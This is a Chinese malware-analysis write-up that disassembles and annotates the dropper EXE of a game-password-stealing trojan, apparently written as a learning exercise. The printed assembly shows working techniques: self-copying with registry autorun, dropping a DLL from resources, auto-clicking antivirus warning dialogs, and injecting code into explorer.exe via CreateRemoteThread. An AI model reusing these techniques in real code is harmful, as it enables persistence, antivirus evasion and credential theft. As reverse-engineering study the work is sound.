【文章标题】: 菜鸟逆向学习:Trojan-PSW.Win32.OnLineGames.diz 木马分析(卡巴斯基命名)------EXE部分。
【文章作者】: zzy
【作者邮箱】: findmydream@126.com
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
一、 自我复制部分
a) 初始化文件路径名
00401000 push ebp
00401001 mov ebp, esp
00401003 sub esp, 424h
00401009 push ebx
0040100A push esi
0040100B push edi
0040100C nop
0040100D nop
0040100E nop
0040100F nop
00401010 nop
00401011 nop
00401012 nop
00401013 nop
00401014 nop
00401015 nop
00401016 nop
00401017 nop
00401018 nop
00401019 nop
0040101A nop
0040101B nop
0040101C nop
0040101D nop
0040101E nop
0040101F nop
00401020 nop
00401021 nop
00401022 nop
00401023 nop
00401024 nop
00401025 nop
00401026 nop
00401027 nop
00401028 nop
00401029 nop
0040102A nop
0040102B nop
0040102C nop
0040102D nop
0040102E nop
0040102F nop
00401030 nop
00401031 nop
00401032 nop
00401033 nop
00401034 nop
00401035 nop
00401036 nop
00401037 nop
00401038 mov esi, offset Name ; "51343281"
0040103D xor ebx, ebx
0040103F push esi ; lpName
00401040 push ebx ; bInheritHandle
00401041 push 1F0003h ; dwDesiredAccess
00401046 call ds:OpenEventA
0040104C test eax, eax
0040104E jnz loc_4013D0 ; 上一个实例正在初始化状态
00401054 push esi ; lpName
00401055 push ebx ; bInitialState
00401056 push ebx ; bManualReset
00401057 push ebx ; lpEventAttributes
00401058 call ds:CreateEventA ; 创建事件,如果有当前病毒的实例正处于等待状态,将通知该实例退出。
0040105E push 1F4h ; dwMilliseconds
00401063 mov esi, eax
00401065 call ds:Sleep
0040106B push esi ; hObject
0040106C call ds:CloseHandle
00401072 mov esi, 104h
00401077 lea eax, [ebp+szLongPath]
0040107D push esi ; nSize
0040107E push eax ; lpFilename
0040107F push ebx ; hModule
00401080 mov [ebp+var_1], 1
00401084 call ds:GetModuleFileNameA ; 获取当前进程路径名
0040108A mov edi, ds:GetShortPathNameA
00401090 lea eax, [ebp+ModuleFileName]
00401096 push esi ; cchBuffer
00401097 push eax ; lpszShortPath
00401098 lea eax, [ebp+szLongPath]
0040109E push eax ; lpszLongPath
0040109F call edi ; GetShortPathNameA
004010A1 lea eax, [ebp+szLongPath]
004010A7 push esi ; uSize
004010A8 push eax ; lpBuffer
004010A9 call ds:GetSystemDirectoryA ; 获取system32目录
004010AF lea eax, [ebp+LibName_arg_0]
004010B5 push esi ; cchBuffer
004010B6 push eax ; lpszShortPath
004010B7 lea eax, [ebp+szLongPath]
004010BD push eax ; lpszLongPath
004010BE call edi ; GetShortPathNameA
004010C0 lea eax, [ebp+szLongPath]
004010C6 push esi ; uSize
004010C7 push eax ; lpBuffer
004010C8 call ds:GetWindowsDirectoryA
004010CE lea eax, [ebp+Data]
004010D4 push esi ; cchBuffer
004010D5 push eax ; lpszShortPath
004010D6 lea eax, [ebp+szLongPath]
004010DC push eax ; lpszLongPath
004010DD call edi ; GetShortPathNameA
004010DF lea eax, [ebp+LibName_arg_0]
004010E5 push offset asc_403264 ; "\\"
004010EA push eax ; char *
004010EB call strcat
004010F0 lea eax, [ebp+LibName_arg_0]
004010F6 push offset s_Upxdnd_dll ; "upxdnd.dll"
004010FB push eax ; char *
004010FC call strcat ; X:\Windows\system32\upxdnd.dll
00401101 lea eax, [ebp+Data]
00401107 push offset asc_403264 ; "\\"
0040110C push eax ; char *
0040110D call strcat
00401112 lea eax, [ebp+Data]
00401118 push offset s_Upxdnd_exe ; "upxdnd.exe"
0040111D push eax ; char *
0040111E call strcat ; X:\Windows\upxdnd.exe
b) 复制exe部分1:当前进程模块路径名不为%windir%\upxdnd.exe,则将当前进程程序拷贝到%windir%\upxdnd.exe,成功后将%windir%\upxdnd.exe在注册表中设为自启动。
0040115D lea eax, [ebp+Data]
00401163 push eax ; char *
00401164 lea eax, [ebp+ModuleFileName]
0040116A push eax ; char *
0040116B call ds:_stricmp
00401171 pop ecx
00401172 test eax, eax
00401174 pop ecx
00401175 jz loc_40121A ; 当前进程为X:\Windows\upxdnd.exe则跳转
0040117B lea eax, [ebp+Data]
00401181 push ebx ; bFailIfExists
00401182 push eax ; lpNewFileName
00401183 lea eax, [ebp+ModuleFileName]
00401189 push eax ; lpExistingFileName
0040118A call ds:CopyFileA ; 拷贝到X:\Windows\upxdnd.exe
00401190 test eax, eax
00401192 jnz short loc_401205
00401205 loc_401205: ;
00401205 lea eax, [ebp+Data]
0040120B push eax ; lpData
0040120C push offset ValueName ; "upxdnd"
00401211 call SetAutoRun ; 修改注册表将eax指向的病毒文件设为自启动
00401216 pop ecx
00401217 pop ecx
00401218 jmp short loc_40121D
c) 复制exe部分2:如果上面拷贝到%windir%\upxdnd.exe失败,则将目标路径名随机命名,再次拷贝到%windir%\??????.exe(??????为随机生成的小写字母),同时将该随机生成名称的程序设为自启动。
00401194 push 0Ah
00401196 push offset s_Upxdnd_exe ; "upxdnd.exe"
0040119B call ConvToRandString ;将upxdnd.exe转换为随机字符串(小写字母组成)
004011A0 pop ecx
004011A1 lea eax, [ebp+szLongPath]
004011A7 pop ecx
004011A8 mov dword ptr s_Upxdnd_exe+6, 6578652Eh ;将前面转换得到的随机字符串的后四个字符替换为".exe"
004011B2 push esi ; uSize
004011B3 push eax ; lpBuffer
004011B4 call ds:GetWindowsDirectoryA
004011BA lea eax, [ebp+Data]
004011C0 push esi ; cchBuffer
004011C1 push eax ; lpszShortPath
004011C2 lea eax, [ebp+szLongPath]
004011C8 push eax ; lpszLongPath
004011C9 call edi ; GetShortPathNameA
004011CB lea eax, [ebp+Data]
004011D1 push offset asc_403264 ; "\\"
004011D6 push eax ; char *
004011D7 call strcat
004011DC lea eax, [ebp+Data]
004011E2 push offset s_Upxdnd_exe ; "??????.exe"
004011E7 push eax ; char *
004011E8 call strcat
004011ED add esp, 10h
004011F0 lea eax, [ebp+Data]
004011F6 push ebx ; bFailIfExists
004011F7 push eax ; lpNewFileName
004011F8 lea eax, [ebp+ModuleFileName]
004011FE push eax ; lpExistingFileName
004011FF call ds:CopyFileA ; 拷贝到windows目录下并随机命名
00401205 loc_401205: ;
00401205 lea eax, [ebp+Data]
0040120B push eax ; lpData
0040120C push offset ValueName ; "upxdnd"
00401211 call SetAutoRun ; 修改注册表将eax指向的病毒文件设为自启动
00401216 pop ecx
00401217 pop ecx
00401218 jmp short loc_40121D
d) 复制DLL部分:从资源中释放DLL,并拷贝到%windir%\System32\upxdnd.dll。
0040121D push ebx ; lpModuleName
0040121E call ds:GetModuleHandleA
00401224 push offset Type ; "DLL"
00401229 push 65h ; lpName
0040122B push eax ; hModule
0040122C mov [ebp+hObject], eax
0040122F call ds:FindResourceA
00401235 push eax ; hResInfo
00401236 mov [ebp+hResData], eax
00401239 push [ebp+hObject] ; hModule
0040123C call ds:SizeofResource
00401242 push [ebp+hResData] ; hResInfo
00401245 mov [ebp+NumberOfBytesWritten], eax
00401248 push [ebp+hObject] ; hModule
0040124B call ds:LoadResource
00401251 push eax ; hResData
00401252 call ds:LockResource
00401258 mov [ebp+lpBuffer], eax
0040125B lea eax, [ebp+LibName_arg_0] ; windows\system32\upxdnd.dll
00401261 push eax ; lpFileName
00401262 call ds:DeleteFileA ; 先删除upxdnd.dll文件,以免创建失败。
00401268 push ebx ; hTemplateFile
00401269 push 80h ; dwFlagsAndAttributes
0040126E push 2 ; dwCreationDisposition
00401270 push ebx ; lpSecurityAttributes
00401271 push 1 ; dwShareMode
00401273 lea eax, [ebp+LibName_arg_0]
00401279 push 40000000h ; dwDesiredAccess
0040127E push eax ; lpFileName
0040127F call ds:CreateFileA ; 创建文件:windows\system32\upxdnd.dll
00401285 cmp eax, 0FFFFFFFFh
00401288 mov [ebp+hObject], eax
0040128B jnz loc_401316 ; 创建成功
如果创建 %windir%\System32\upxdnd.dll 失败,则生成一个小写字母的随机DLL名(%windir%\System32\??????.dll),如果本次生成仍然失败,则跳到程序结束自动结束。
00401291 push 0Ah
00401293 push offset s_Upxdnd_dll ; "upxdnd.dll"
00401298 call ConvToRandString ;将upxdnd. dll转换为随机字符串(小写字母组成)
0040129D pop ecx
0040129E lea eax, [ebp+szLongPath]
004012A4 pop ecx
004012A5 mov dword ptr s_Upxdnd_dll+6, 6C6C642Eh将前面转换得到的随机字符串的后四个字符替换为".dll"
004012AF push esi ; uSize
004012B0 push eax ; lpBuffer
004012B1 call ds:GetSystemDirectoryA
004012B7 lea eax, [ebp+LibName_arg_0]
004012BD push esi ; cchBuffer
004012BE push eax ; lpszShortPath
004012BF lea eax, [ebp+szLongPath]
004012C5 push eax ; lpszLongPath
004012C6 call edi ; GetShortPathNameA
004012C8 lea eax, [ebp+LibName_arg_0]
004012CE push offset asc_403264 ; "\\"
004012D3 push eax ; char *
004012D4 call strcat
004012D9 lea eax, [ebp+LibName_arg_0]
004012DF push offset s_Upxdnd_dll ; "??????.dll"
004012E4 push eax ; char *
004012E5 call strcat
004012EA add esp, 10h
004012ED lea eax, [ebp+LibName_arg_0]
004012F3 push ebx ; hTemplateFile
004012F4 push 80h ; dwFlagsAndAttributes
004012F9 push 2 ; dwCreationDisposition
004012FB push ebx ; lpSecurityAttributes
004012FC push 1 ; dwShareMode
004012FE push 40000000h ; dwDesiredAccess
00401303 push eax ; lpFileName
00401304 call ds:CreateFileA ; 创建随机命名的DLL文件
0040130A cmp eax, 0FFFFFFFFh
0040130D mov [ebp+hObject], eax
00401310 jz loc_4013D0
0040190D ConvToRandString proc near ; CODE XREF:
0040190D arg_0 = dword ptr 0Ch
0040190D arg_4 = dword ptr 10h
0040190D push esi
0040190E push edi
0040190F call ds:GetTickCount
00401915 push eax ; unsigned int
00401916 call ds:srand
0040191C mov edi, [esp+4+arg_0]
00401920 xor esi, esi
00401922 cmp [esp+4+arg_4], esi
00401926 pop ecx
00401927 jle short loc_401942 ; 追加串结尾符
00401929 call ds:rand
0040192F push 1Ah
00401931 cdq
00401932 pop ecx
00401933 idiv ecx ; rand函数生成的随机数除以0x1A(即十进制26)
00401935 add dl, 61h ; 余数再加上0x61,(即'a'),即随机生成一小写字母
00401938 mov [esi+edi], dl ; 将上面随机生成的小写字母写入到传给函数的串指针的对应位置
0040193B inc esi
0040193C cmp esi, [esp+arg_4]
00401940 jl short loc_401929 ; 未完成串中所有字符的转换则继续
00401942 and byte ptr [esi+edi], 0 ; 追加串结尾符
00401946 pop edi
00401947 pop esi
00401948 retn
00401948 ConvToRandString endp
00401316 lea eax, [ebp+NumberOfBytesWritten]
00401319 push ebx ; lpOverlapped
0040131A push eax ; lpNumberOfBytesWritten
0040131B push [ebp+NumberOfBytesWritten] ; nNumberOfBytesToWrite
0040131E push [ebp+lpBuffer] ; lpBuffer
00401321 push [ebp+hObject] ; hFile
00401324 call ds:WriteFile ; 将资源中的dll文件写入到Windows\system32\upxdnd.dll或随机命名DLL中
0040132A push [ebp+hObject] ; hObject
0040132D mov esi, ds:CloseHandle
00401333 call esi ; CloseHandle
00401335 push [ebp+hResData] ; hResData
00401338 call ds:FreeResource
0040133E push 0C8h ; dwMilliseconds
00401343 call ds:Sleep
二、 Anti杀毒软件部分
a) 创建新的线程Anti杀毒软件
00401123 add esp, 20h
00401126 push ebx ; lpThreadId
00401127 push ebx ; dwCreationFlags
00401128 push ebx ; lpParameter
00401129 push offset AntiAV ; lpStartAddress
0040112E push 400h ; dwStackSize
00401133 push ebx ; lpThreadAttributes
00401134 call ds:CreateThread
0040113A push 2 ; nPriority
0040113C push eax ; hThread
0040113D mov [ebp+hObject], eax
00401140 call ds:SetThreadPriority
00401146 push 3E8h ; dwMilliseconds
0040114B push [ebp+hObject] ; hHandle
0040114E call ds:WaitForSingleObject ; 等待线程结束
00401154 push [ebp+hObject] ; hObject
00401157 call ds:CloseHandle
b) AntiAV线程处理过程,模拟点击卡巴警告窗口中的允许/跳过按钮,自动关闭卡巴和瑞星的提示窗口。
004016C9 ; DWORD __stdcall AntiAV(LPVOID)
004016C9 AntiAV proc near ; DATA XREF: WinMain(x,x,x,x)+129 o
004016C9 String = byte ptr -24h
004016C9 hWnd = dword ptr -4
004016C9 push ebp
004016CA mov ebp, esp
004016CC sub esp, 24h
004016CF push ebx
004016D0 push esi
004016D1 push edi
004016D2 nop
004016D3 push 0Fh
004016D5 push offset AVP_AlertDlgClass ; "i~x"
004016DA call Decrypt ; 解密后:AVP.AlertDialog
004016DF push 19h
004016E1 push offset AVP_NotifyDlg
004016E6 call Decrypt ; 解密后:-AVP.Product_Notification
004016EB push 12h
004016ED push offset RsRegMonWndName ; "嘭\xFF姎蓹艛葪痄赦?
004016F2 call Decrypt ; 解密后:瑞星注册表监控提示.
004016F7 mov ebx, ds:FindWindowA
004016FD mov esi, ds:PostMessageA
00401703 add esp, 18h
00401706 xor edi, edi
00401708 loc_401708: ; CODE XREF: AntiAV+C1 j
00401708 ; AntiAV+CE j
00401708 push 1 ; dwMilliseconds
0040170A call ds:Sleep
00401710 push edi ; lpWindowName
00401711 push offset AVP_AlertDlgClass ; "i~x"
00401716 call ebx ; FindWindowA ; 查找AVP的警告窗口
00401718 cmp eax, edi
0040171A jz short loc_40176D
0040171C push 5 ; uCmd
0040171E push eax ; hWnd
0040171F loc_40171F: ; CODE XREF: AntiAV+A2 j
0040171F call ds:GetWindow ; Get handle of a window that has
0040171F ; the specified relationship to
0040171F ; the specified window
00401725 cmp eax, edi
00401727 mov [ebp+hWnd], eax
0040172A jz short loc_40176D
0040172C lea eax, [ebp+String]
0040172F push 1Fh ; nMaxCount
00401731 push eax ; lpString
00401732 push [ebp+hWnd] ; hWnd
00401735 call ds:GetWindowTextA
0040173B cmp dword ptr [ebp+String], 0EDD0CAD4h ; 允许
00401742 jz short loc_40174D
00401744 cmp dword ptr [ebp+String], 0FDB9F8CCh ; 跳过
0040174B jnz short loc_401766 ; GW_HWNDNEXT
0040174D loc_40174D: ; CODE XREF: AntiAV+79 j
0040174D push edi ; lParam
0040174E push 1 ; wParam
00401750 push 201h ; Msg
00401755 push [ebp+hWnd] ; hWnd
00401758 call esi ; PostMessageA ; 模拟按下鼠标左键
0040175A push edi ; lParam
0040175B push edi ; wParam
0040175C push 202h ; Msg
00401761 push [ebp+hWnd] ; hWnd
00401764 call esi ; PostMessageA ; 模拟释放鼠标左键
00401764 ; 自动点击卡巴警告窗口的允许或跳过按钮
00401766 loc_401766: ; CODE XREF: AntiAV+82 j
00401766 push 2 ; GW_HWNDNEXT
00401768 push [ebp+hWnd]
0040176B jmp short loc_40171F
0040176D ; ---------------------------------------------------------------------------
0040176D loc_40176D: ; CODE XREF: AntiAV+51 j
0040176D ; AntiAV+61 j
0040176D push edi ; lpWindowName
0040176E push offset s_IX ; AVP_NotifyDlg+1
00401773 call ebx ; FindWindowA
00401775 cmp eax, edi
00401777 jz short loc_401780
00401779 push edi ; lParam
0040177A push edi ; wParam
0040177B push 10h ; Msg
0040177D push eax ; hWnd
0040177E call esi ; PostMessageA ; 关闭AVP的 Notify窗口
00401780 loc_401780: ; CODE XREF: AntiAV+AE j
00401780 push offset RsRegMonWndName ; "嘭\xFF姎蓹艛葪痄赦?
00401785 push edi ; lpClassName
00401786 call ebx ; FindWindowA
00401788 cmp eax, edi
0040178A jz loc_401708
00401790 push edi ; lParam
00401791 push edi ; wParam
00401792 push 10h ; Msg
00401794 push eax ; hWnd
00401795 call esi ; PostMessageA ; 关闭瑞星注册表监控提示窗
00401797 jmp loc_401708
00401797 AntiAV endp
三、 加载病毒释放的DLL:
a) 优先使用注入到Exporer.exe中加载方式:首先获取Explorer.exe的PID,然后调用InjectCodeToExplorerAndRun(DllPathName, CurProcessPathName, PID)注入到Explorer.exe,如果当前进程是%windir%\upxdnd.exe, CurProcessPathName为NULL,否则就是当前进程文件路径名,调用成功后,退出进程。
00401349 push offset s_Explorer_exe ; "explorer.exe"
0040134E call GetProcessIdByProcessName;获取Explorer.exe的进程ID
00401353 cmp eax, ebx
00401355 pop ecx
00401356 jz short loc_401388 ; 未找到Explorer.exe进程
00401358 cmp [ebp+var_1], bl ; 当前是否是%windir%\upxdnd.exe进程
0040135B jnz short loc_401363 ; 当前不是%windir%\upxdnd.exe
0040135D mov [ebp+ModuleFileName], bl ; NULL
00401363 loc_401363: ;
00401363 push eax ; ProcessId
00401364 lea eax, [ebp+ModuleFileName]
0040136A push eax ; char *
0040136B lea eax, [ebp+LibName_arg_0]
00401371 push eax ; char *
00401372 call InjectCodeToExplorerAndRun
00401377 add esp, 0Ch
0040137A cmp eax, ebx
0040137C jz short loc_401388
0040137E push eax ; hObject
0040137F call esi ; CloseHandle
00401381 push ebx ; uExitCode
00401382 call ds:ExitProcess ; 退出进程
b) 如果没有找到Explorer.exe的PID,或者注入失败,则从当前进程加载DLL,加载成功后,然后加载Dll基址+0x30处所指向的函数,然后一直循环等待,直到有新的病毒实例运行,当有新的病毒实例启动时,加载Dll基址+0x34处所指向的函数,然后退出当前病毒实例。
00401388 lea eax, [ebp+LibName_arg_0]
0040138E push eax ; lpLibFileName
0040138F call ds:LoadLibraryA ; 直接在本进程加载病毒DLL
00401395 mov edi, eax
00401397 cmp edi, ebx
00401399 jz short loc_4013D0
0040139B mov eax, [edi+30h]
0040139E mov ecx, [edi+34h]
004013A1 cmp eax, ebx
004013A3 mov [ebp+lpBuffer], ecx
004013A6 jz short loc_4013C9
004013A8 cmp ecx, ebx
004013AA jz short loc_4013C9
004013AC call eax ; 调用Dll基址+0x30处指向的函数
004013AE push offset Name ; "51343281"
004013B3 push ebx ; bInheritHandle
004013B4 push 1F0003h ; dwDesiredAccess
004013B9 call ds:OpenEventA ;
004013BF cmp eax, ebx ; 直到新的实例运行创建事件时,否则一直在此时循环等待。
004013C1 jz short loc_4013AE
004013C3 push eax ; hObject
004013C4 call esi ; CloseHandle
004013C6 call [ebp+lpBuffer] ; 调用Dll基址+0x34处指向的函数
004013C9 push edi ; hLibModule
004013CA call ds:FreeLibrary ; 释放DLL
004013D0 loc_4013D0: ; CODE XREF: WinMain(x,x,x,x)+4E j
004013D0 ; WinMain(x,x,x,x)+310 j
004013D0 ; WinMain(x,x,x,x)+399 j
004013D0 pop edi
004013D1 pop esi
004013D2 xor eax, eax
004013D4 pop ebx
004013D5 leave
004013D6 retn 10h
四、 注入到Explorer.exe分析
0040144D ; int __cdecl InjectCodeToExplorerAndRun(char *,char *,HMODULE ProcessId)
0040144D var_1C = dword ptr -1Ch
0040144D lpStartAddress = dword ptr -18h ; 目标进程分配的第二块内存
0040144D lpBuffer = dword ptr -14h
0040144D lpAddress = dword ptr -10h ; 目标进程分配的第一块内存
0040144D var_C = dword ptr -0Ch ; 在当前进程分配的第二个内存块
0040144D hProcess = dword ptr -8
0040144D hObject = dword ptr -4
0040144D arg_0_LibName = dword ptr 8
0040144D arg_4_ModuleName= dword ptr 0Ch
0040144D ProcessId = dword ptr 10h ; 进程ID/kernel32句柄
a) 打开Explorer.exe进程,失败则直接返回
0040144D push ebp
0040144E mov ebp, esp
00401450 sub esp, 1Ch
00401453 nop
00401454 nop
00401455 nop
00401456 push [ebp+ProcessId] ; dwProcessId
00401459 push 0 ; bInheritHandle
0040145B push 1F0FFFh ; dwDesiredAccess
00401460 call ds:OpenProcess
00401466 test eax, eax
00401468 mov [ebp+hObject], eax
0040146B jnz short loc_40146F
0040146D leave
0040146E retn
b) 在当前病毒实例进程和Explorer.exe进程分别分配两块内存
0040146F push ebx
00401470 push esi
00401471 push edi
00401472 call ds:GetCurrentProcess
00401478 and [ebp+var_1C], 0
0040147C mov ebx, 1000h
00401481 push ebx ; dwSize
00401482 push eax ; hProcess
00401483 mov [ebp+hProcess], eax
00401486 call AllocateMemory
0040148B mov edi, 10000h
00401490 mov esi, eax
00401492 push edi ; dwSize
00401493 push [ebp+hProcess] ; hProcess
00401496 call AllocateMemory
0040149B push ebx ; dwSize
0040149C mov [ebp+var_C], eax ; 在当前进程分配的第二个内存块
0040149F push [ebp+hObject] ; hProcess
004014A2 call AllocateMemory
004014A7 push ebx ; dwSize
004014A8 mov [ebp+lpAddress], eax ; 目标进程分配的第一块内存
004014AB push [ebp+hObject] ; hProcess
004014AE call AllocateMemory
004014B3 add esp, 20h
004014B6 mov [ebp+lpStartAddress], eax ; 目标进程分配的第二块内存
004014B9 test esi, esi
004014BB jz loc_40163C
004014C1 cmp [ebp+var_C], 0 ; 在当前进程分配的第二个内存块
004014C5 jz loc_40163C
004014CB cmp [ebp+lpAddress], 0 ; 目标进程分配的第一块内存
004014CF jz loc_40163C
004014D5 test eax, eax
004014D7 jz loc_40163C
c) 从内存的kernel32.dll模块中搜索InternalLoadLibrary函数(LoadLibrary的内层调用)地址(通过9个字节的特征串进行搜索):
004014DD push offset ModuleName ; "kernel32.dll"
004014E2 call ds:GetModuleHandleA
004014E8 push edi ; dwBytes
004014E9 push 0 ; uFlags
004014EB mov [ebp+ProcessId], eax ; 进程ID/kernel32句柄
004014EE call ds:GlobalAlloc
004014F4 push eax ; hMem
004014F5 mov [ebp+lpBuffer], eax
004014F8 call ds:GlobalLock
004014FE push 0 ; lpNumberOfBytesRead
00401500 push edi ; nSize
00401501 push [ebp+lpBuffer] ; lpBuffer
00401504 push [ebp+ProcessId] ; lpBaseAddress
00401507 push [ebp+hProcess] ; hProcess
0040150A call ds:ReadProcessMemory ; 将内存中的kernel32.dll起始的0x10000个字节读取到刚分配的内存中
00401510 push 9
00401512 push offset loc_403254
00401517 push edi
00401518 push [ebp+lpBuffer]
0040151B call SearchSignInBuffer ; 搜索LoadLibrary函数的内层调用
00401520 mov edi, ds:GetProcAddress
00401526 add esp, 10h
00401529 test eax, eax
0040152B jz short loc_401534
0040152D mov ecx, [ebp+ProcessId] ; 进程ID/kernel32句柄
00401530 add eax, ecx
00401532 jmp short loc_40153E
d) 如果没有搜索到InternalLoadLibrary,则直接使用kernel32.dll导出的LoadLibraryA函数地址:
0040151B call SearchSignInBuffer ; 搜索LoadLibrary函数的内层调用
00401520 mov edi, ds:GetProcAddress
00401526 add esp, 10h
00401529 test eax, eax
0040152B jz short loc_401534
00401534 push offset ProcName ; "LoadLibraryA"
00401539 push [ebp+ProcessId] ; hModule
0040153C call edi ; GetProcAddress
e) 将相关函数地址和相关的字符串写入到前面在当前进程中分配的第一块内存中:
typedef struct __RemoteData
DWORD LoadLibraryAAddr;
DWORD DeleteFileAAddr;
DWORD OpenEventAAddr;
DWORD SleepAddr;
DWORD CloseHandleAddr;
DWORD FreeLibraryAddr;
Char DllPathName[MAX_PATH]; %windir%\System32\upxdnd.dll(或随机名的dll名)
Char LoaderPathName[MAX_PATH]:当前病毒实例的路径名
+220: "51343281"
} RemoteData;
0040153E push offset s_Deletefilea ; "DeleteFileA"
00401543 mov [esi], eax ; 写入LoadLibrary/内层调用函数的地址
00401545 push [ebp+ProcessId] ; hModule
00401548 call edi ; GetProcAddress
0040154A push offset s_Openeventa ; "OpenEventA"
0040154F mov [esi+4], eax
00401552 push [ebp+ProcessId] ; hModule
00401555 call edi ; GetProcAddress
00401557 push offset s_Sleep ; "Sleep"
0040155C mov [esi+8], eax
0040155F push [ebp+ProcessId] ; hModule
00401562 call edi ; GetProcAddress
00401564 push offset s_Closehandle ; "CloseHandle"
00401569 mov [esi+0Ch], eax
0040156C push [ebp+ProcessId] ; hModule
0040156F call edi ; GetProcAddress
00401571 push offset s_Freelibrary ; "FreeLibrary"
00401576 mov [esi+10h], eax
00401579 push [ebp+ProcessId] ; hModule
0040157C call edi ; GetProcAddress
0040157E mov [esi+14h], eax ; 以上保存了6个函数地址
00401581 lea eax, [esi+18h]
00401584 test eax, eax
00401586 jz short loc_401593
00401588 push [ebp+arg_0_LibName] ; char *
0040158B push eax ; char *
0040158C call strcpy ; 第7个写入LibPathName:X:\Windows\System32\upxdnd.dll
00401591 pop ecx
00401592 pop ecx
00401593 loc_401593: ; CODE XREF: InjectCodeToExplorerAndRun+139 j
00401593 lea eax, [esi+11Ch]
00401599 test eax, eax
0040159B jz short loc_4015A8
0040159D push [ebp+arg_4_ModuleName] ; char *
004015A0 push eax ; char *
004015A1 call strcpy
004015A6 pop ecx
004015A7 pop ecx
004015A8 loc_4015A8: ; CODE XREF: InjectCodeToExplorerAndRun+14E j
004015A8 lea eax, [esi+220h]
004015AE push offset Name ; "51343281"
004015B3 push eax ; char *
004015B4 call strcpy ; 在当前进程分配的第一块内存中写入相关函数地址,及相关字符串。
f) 下面将RemoteThreadProc函数代码拷贝到在当前病毒进程中分配的第二块内存中
004015B9 mov edi, offset InjectCodeToExplorerAndRun
004015BE mov eax, offset RemoteThreadProc
004015C3 sub edi, eax
004015C5 push edi ; dwSize
004015C6 push [ebp+var_C] ; lpBuffer
004015C9 push eax ; lpAddress
004015CA push [ebp+hProcess] ; hProcess
004015CD call CopyMemory ; 将函数RemoteThreadProc写入当前进程分配的第二块内存中
004015D2 add esp, 18h
004015D5 test eax, eax
004015D7 jz short loc_401623
g) 将当前进程中两个内存块中的数据写到Explorer.exe进程中,第一块内存为相关函数地址,病毒DLL的路径名,病毒EXE的路径名,还有一个字符串,第二块内存保存为欲在Explorer.exe进程中执行的函数,然后创建远线程,注入到Explorer.exe进程,指向第一块内存的指针作为远线程处理函数的参数,因此在远线程处理函数中可以使用第一个内存块中那些相关数据。
004015D9 push 230h ; dwSize
004015DE push esi ; lpBuffer
004015DF push [ebp+lpAddress] ; lpAddress
004015E2 push [ebp+hObject] ; hProcess
004015E5 call WriteToProcess ; 将当前进程第一块内存区数据拷贝到目标进程第一块内存中
004015EA add esp, 10h
004015ED test eax, eax
004015EF jz short loc_401623
004015F1 push edi ; dwSize
004015F2 push [ebp+var_C] ; lpBuffer
004015F5 push [ebp+lpStartAddress] ; lpAddress
004015F8 push [ebp+hObject] ; hProcess
004015FB call WriteToProcess ; 将当前进程第二块内存区中的函数写入目标进程第二块内存区中
00401600 add esp, 10h
00401603 test eax, eax
00401605 jz short loc_401623
00401607 xor eax, eax
00401609 push eax ; lpThreadId
0040160A push eax ; dwCreationFlags
0040160B push [ebp+lpAddress] ; lpParameter
0040160E push [ebp+lpStartAddress] ; lpStartAddress
00401611 push 400h ; dwStackSize
00401616 push eax ; lpThreadAttributes
00401617 push [ebp+hObject] ; hProcess
0040161A call ds:CreateRemoteThread ; 创建远线程到目标进程,线程函数和参数已经写入目标进程
00401620 mov [ebp+var_1C], eax
00401623 push ebx ; dwSize
00401624 push esi ; lpAddress
00401625 push [ebp+hProcess] ; hProcess
00401628 call FreeMemory
0040162D push ebx ; dwSize
0040162E push [ebp+var_C] ; lpAddress
00401631 push [ebp+hProcess] ; hProcess
00401634 call FreeMemory
00401639 add esp, 18h
0040163C push [ebp+hObject] ; hObject
0040163F call ds:CloseHandle
00401645 mov eax, [ebp+var_1C]
00401648 pop edi
00401649 pop esi
0040164A pop ebx
0040164B leave
0040164C retn
h) 远线程处理函数分析:调用LoadLibraryA加载病毒DLL,然后,调用DLL映像基址+0x30所指向的地址处的函数。然后判断LoaderPathName是否为NULL(从前面可以看到如果EXE为%windir%\upxdnd.exe,则其为NULL),不为NULL,则删除名称为LoaderPathName的文件,然后函数调用OpenEventA打开名为"51343281"的事件,除非有新的病毒实例启动创建这个事件,否则该函数在此处一直循环等待,当有新病毒实例运行后,线程函数退出循环,调用 Dll+0x34 处所指向的函数,然后释放DLL,退出远线程。
004013D9 RemoteThreadProc proc near ;
004013D9 var_4 = dword ptr -4
004013D9 arg_0 = dword ptr 8
004013D9 push ebp
004013DA mov ebp, esp
004013DC push ecx
004013DD push esi
004013DE mov esi, [ebp+arg_0]
004013E1 push edi
004013E2 lea eax, [esi+18h] ; LibPathName
004013E5 push eax
004013E6 call dword ptr [esi] ; 加载LibPathName所指DLL
004013E8 and byte ptr [ebp+arg_0+3], 0
004013EC mov edi, eax
004013EE mov eax, [edi+30h]
004013F1 mov ecx, [edi+34h]
004013F4 test eax, eax
004013F6 mov [ebp+var_4], ecx
004013F9 jz short loc_401447
004013FB push ebx
004013FC call eax ; 调用Dll中的函数(未导出)
004013FE lea ebx, [esi+11Ch] ; ModuleFileName
00401404 cmp byte ptr [ebx], 0
00401407 jz short loc_401419 ;
00401409 cmp byte ptr [ebp+arg_0+3], 0
0040140D jnz short loc_401419 ; "51343281"
0040140F push ebx
00401410 call dword ptr [esi+4] ; DeleteFileA 删除注入器病毒程序
00401413 test eax, eax
00401415 setnz byte ptr [ebp+arg_0+3] ; 删除标记,重复利用输入参数
00401419 lea eax, [esi+220h] ; "51343281"
0040141F push eax
00401420 push 0
00401422 push 1F0003h
00401427 call dword ptr [esi+8] ; OpenEventA
0040142A test eax, eax
0040142C jnz short loc_401435 ; 直到有新的病毒实例创建事件,否则该线程处理函数一直处于循环等待状态
0040142E push 64h
00401430 call dword ptr [esi+0Ch] ; Sleep 100ms
00401433 jmp short loc_401404
00401435 ; ---------------------------------------------------------------------------
00401435 push eax
00401436 call dword ptr [esi+10h] ; CloseHandle Event
00401439 call [ebp+var_4] ; 调用 Dll+0x34 处所指向的函数
0040143C push edi
0040143D call dword ptr [esi+14h] ; FreeLibrary Dll
00401440 push edi
00401441 call dword ptr [esi+10h] ; CloseHandle hDllModule
00401444 xor eax, eax
00401446 pop ebx
00401447 pop edi
00401448 pop esi
00401449 leave
0040144A locret_40144A:
0040144A retn 4
0040144A RemoteThreadProc endp
五、 病毒程序中的解密程序:
00401979 Decrypt proc near ; CODE XREF: SetAutoRun+2B p
00401979 ; AntiAV+11 p AntiAV+1D p
00401979 ; AntiAV+29 p
00401979 arg_0 = dword ptr 8
00401979 arg_4 = dword ptr 0Ch
00401979 push ebp
0040197A mov ebp, esp
0040197C nop
0040197D xor ecx, ecx
0040197F cmp [ebp+arg_4], ecx
00401982 jle short loc_401992
